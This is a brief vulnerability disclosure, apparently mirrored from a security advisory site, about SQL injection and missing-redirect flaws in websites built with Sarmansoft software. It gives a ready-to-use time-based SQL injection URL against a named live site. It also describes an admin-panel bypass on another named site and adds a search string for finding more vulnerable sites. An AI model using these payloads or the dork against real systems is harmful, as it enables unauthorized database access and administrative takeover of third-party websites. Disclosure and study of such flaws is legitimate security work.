SARMANSOFT SQL - NO-REDİRECT PoC
2024-3-21 00:49:48 Author: cxsecurity.com(查看原文) 阅读量:10 收藏

I found no-redirect vulnerability and sql vulnerability on some websites prepared with Sarmansoft. In the first example, you can add the "and" "or" parameter and execute your own queries, apart from the database's own query. SQL İNJ (SLEEP) EXAMPLE: https://passionturkey.com/neler.php?id=9%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP) NO-REDİRECT EXAMPLE: https://uyarlar.com.tr/admin/index.php Replace the address with: /admin/anasayfa_ayarlari.php To find more websites // "® Software & Technology | Sarman Soft Software and Technology Services" My Concat Address: [email protected]



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024030050
如有侵权请联系:admin#unsafe.sh